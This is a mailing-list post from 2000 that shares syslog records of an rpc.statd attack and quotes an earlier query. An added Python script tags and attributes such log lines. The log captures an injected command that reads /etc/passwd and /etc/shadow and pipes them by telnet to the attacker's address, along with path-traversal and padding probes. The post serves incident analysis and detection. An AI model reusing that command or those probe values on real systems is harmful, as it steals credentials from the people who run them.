Security Incidents mailing list archives

Re: funky syslog entry


From: BPontz () E-DIALOG COM (Brian Pontz)
Date: Thu, 29 Jun 2000 14:21:50 -0400


Since rpc attacks have come up, I thought I'd share this attack
that happened to me last year. The hacker ended up crashing
the server.

Brian

Oct  5 01:36:09 vs1 sshd[5125]: connect from c992426-f.pinol1.sfba.home.com

Oct  5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:36:49 vs1 rpc.statd: Invalid hostname to
sm_mon:/../../../tmp/Max.rpc.statd.vulnerability

Oct  5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002):
request from non-local host

Oct  5 01:36:51 vs1 portmap[5131]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^?

Oct  5 01:36:54 vs1 portmap[5132]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:36:54 vs1 rpc.statd: unmon request from anti-slavery for unknown
host ^?^?^?^?

Oct  5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep
15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593
/dev/null"

Oct  5 01:36:55 vs1 rpc.statd: unmon request from anti-slavery for unknown
host -c "sleep 2;sleep 15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet
24.5.193.149 1593 >/dev/null"

Oct  5 01:36:57 vs1 portmap[5133]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:36:57 vs1 portmap[5134]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:37:00 vs1 portmap[5135]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:01 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:03 vs1 portmap[5136]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:06 vs1 portmap[5138]: connect from 24.5.193.149 to
callit(mountd):request not forwarded

Oct  5 01:37:07 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:09 vs1 portmap[5140]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:12 vs1 portmap[5142]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:13 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:15 vs1 portmap[5144]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:18 vs1 portmap[5145]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:20 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:21 vs1 portmap[5146]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:24 vs1 portmap[5147]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:26 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:32 vs1 /kernel: pid 5148 (Count.cgi1.2), uid 65534: exited on
signal 10

Oct  5 01:37:32 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:45 vs1 last message repeated 2 times

Oct  5 01:37:59 vs1 sshd[5152]: connect from c992426-f.pinol1.sfba.home.com

Oct  5 01:38:05 vs1 sshd[5153]: connect from c992426-f.pinol1.sfba.home.com

Oct  5 01:41:40 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"uucp" user.

Oct  5 01:42:13 vs1 last message repeated 4 times

Oct  5 01:42:37 vs1 last message repeated 3 times

Oct  5 01:45:58 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"www" user, whose shell is illegal (/nonexistent).

Oct  5 01:46:31 vs1 last message repeated 4 times

Oct  5 01:46:53 vs1 last message repeated 3 times

Oct  5 01:47:02 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"nobody" user, whose shell is illegal (/nonexistent).

Oct  5 01:47:40 vs1 last message repeated 5 times

Oct  5 01:47:55 vs1 last message repeated 2 times

Oct  5 02:09:31 vs1 rpc.statd: Invalid hostname to sm_mon: cybercop

Oct  5 02:09:32 vs1 rpc.statd: unmon request from localhost for unknown host
cybercop

Oct  5 02:09:33 vs1 rpc.statd: Invalid hostname to sm_mon:
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%

Oct  5 02:09:33 vs1 rpc.statd: unmon request from
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%

Oct  5 02:42:04 vs1 sshd[5524]: connect from c992426-d.pinol1.sfba.home.com

Oct  5 02:53:41 vs1 /kernel: pid 5565, uid 65534: exited on signal

-----Original Message-----
From: klug [mailto:klug () KLUG CX]
Sent: Monday, June 26, 2000 5:44 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: funky syslog entry

While searching through syslog entries I found this little tidbit.
Others and I believe it's some sort of scan. Any ideas are welcome.
Portmap has since been removed from this server.

klug

Jun 24 14:39:10 * portmap[27279]:
connect from 193.40.245.45 to dump(): request from unauthorized host

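The two posts above are useful mainly as a detection sample: rpc.statd logs "Invalid hostname to sm_mon" when it rejects a monitor request, portmap logs remote set/callit attempts, and NcFTPd logs the root login attempts, but none of the rpc.statd lines carry the peer address, so the only way to pin them on 24.5.193.149 is to correlate by time with the portmap and FTP lines around them. The script below is an added example, not code from either poster or from any of the daemons named; it tags each syslog line by the shape of what rpc.statd rejected (path traversal, shell metacharacters, long runs of one byte, bytes that cannot appear in a hostname), attributes address-less findings to the nearest known source within a time window, and summarises per source. The sample lines are constructed from the entries in the post, with the injected command shortened to the form the poster's pager cut it to; the tag names and the 60-second window are my own choices.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample, modelled on the syslog entries in the post above.
SAMPLE_LOG = """\
Oct  5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct  5 01:36:49 vs1 rpc.statd: Invalid hostname to sm_mon: /../../../tmp/Max.rpc.statd.vulnerability
Oct  5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002): request from non-local host
Oct  5 01:36:51 vs1 portmap[5131]: connect from 24.5.193.149 to callit(portmapper): request not forwarded
Oct  5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^?
Oct  5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep 15..."
Oct  5 02:09:31 vs1 rpc.statd: Invalid hostname to sm_mon: cybercop
Oct  5 02:09:33 vs1 rpc.statd: Invalid hostname to sm_mon: %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Oct  5 02:16:00 vs1 sshd[5200]: Accepted password for brian from 10.0.0.5 port 2201
"""

# Classic BSD syslog layout: timestamp, host, program[pid]: message.
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
# Syntactically valid hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9-]{0,62}(?:\.[A-Za-z0-9][A-Za-z0-9-]{0,62})*$")
IPV4_RE = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")
SM_MON_PREFIX = "Invalid hostname to sm_mon:"

def parse_syslog(line):
    """Split one syslog line into its fields; None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None

def ts_seconds(ts):
    """Syslog timestamp (no year) to seconds since the start of that year."""
    if not ts:
        return None
    t = datetime.strptime(re.sub(r"\s+", " ", ts), "%b %d %H:%M:%S")
    return (t.timetuple().tm_yday - 1) * 86400 + t.hour * 3600 + t.minute * 60 + t.second

def longest_run(s):
    """Length of the longest run of one repeated character (padding detector)."""
    best = run = 0
    prev = None
    for ch in s:
        run = run + 1 if ch == prev else 1
        best, prev = max(best, run), ch
    return best

def classify(line):
    """Return the detection tags that apply to one syslog line (empty if benign)."""
    rec = parse_syslog(line)
    if rec is None:
        return ["unparsed"]
    prog, msg, tags = rec["prog"], rec["msg"], []
    if prog == "rpc.statd" and msg.startswith(SM_MON_PREFIX):
        # The daemon itself rejected the name, so every such line is a finding;
        # the shape of the rejected value decides how loud it should be.
        tags.append("statd-invalid-hostname")
        value = msg[len(SM_MON_PREFIX):].strip()
        if "../" in value:
            tags.append("path-traversal")
        if any(c in value for c in ';|"`$'):
            tags.append("shell-metachar")
        if longest_run(value) >= 16:          # overflow padding or format probing
            tags.append("repeated-byte-run")
        if not HOSTNAME_RE.match(value):
            tags.append("non-hostname-bytes")
    elif prog == "portmap":
        if "request from non-local host" in msg:
            tags.append("portmap-remote-set")
        if "callit(" in msg:
            tags.append("portmap-callit")
    elif prog == "NcFTPd" and 'tried to login as "root"' in msg:
        tags.append("ftp-root-login")
    return tags

def summarize(text, window=60):
    """Tag every line, attribute address-less findings by time, count per source."""
    findings = []
    for line in text.splitlines():
        tags = classify(line)
        if not tags:
            continue
        rec = parse_syslog(line) or {}
        ip = IPV4_RE.search(line)
        findings.append({"line": line, "tags": tags,
                         "time": ts_seconds(rec.get("ts")),
                         "src": ip.group(1) if ip else None})
    known = [(f["time"], f["src"]) for f in findings if f["src"] and f["time"] is not None]
    for f in findings:
        if f["src"] is None and f["time"] is not None:
            near = [(abs(t - f["time"]), ip) for t, ip in known if abs(t - f["time"]) <= window]
            f["src"] = min(near)[1] if near else None
        f["src"] = f["src"] or "unknown"
    per_source = defaultdict(Counter)
    for f in findings:
        per_source[f["src"]].update(f["tags"])
    return findings, dict(per_source)

if __name__ == "__main__":
    found, by_src = summarize(SAMPLE_LOG)
    for f in found:
        print(",".join(f["tags"]).ljust(60), f["src"], f["line"][:60])
    for src, counts in by_src.items():
        print(src, dict(counts))
```

Two things the output makes visible that the raw log does not: the three rpc.statd rejections at 01:36 land on 24.5.193.149 only because portmap and NcFTPd logged that address seconds earlier, while the "cybercop" and "%%%…" rejections at 02:09 stay "unknown" because nothing nearby recorded a peer. A syntactic hostname check alone would also pass "cybercop", so the base tag has to come from the daemon's own rejection, not from the pattern checks layered on top of it.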
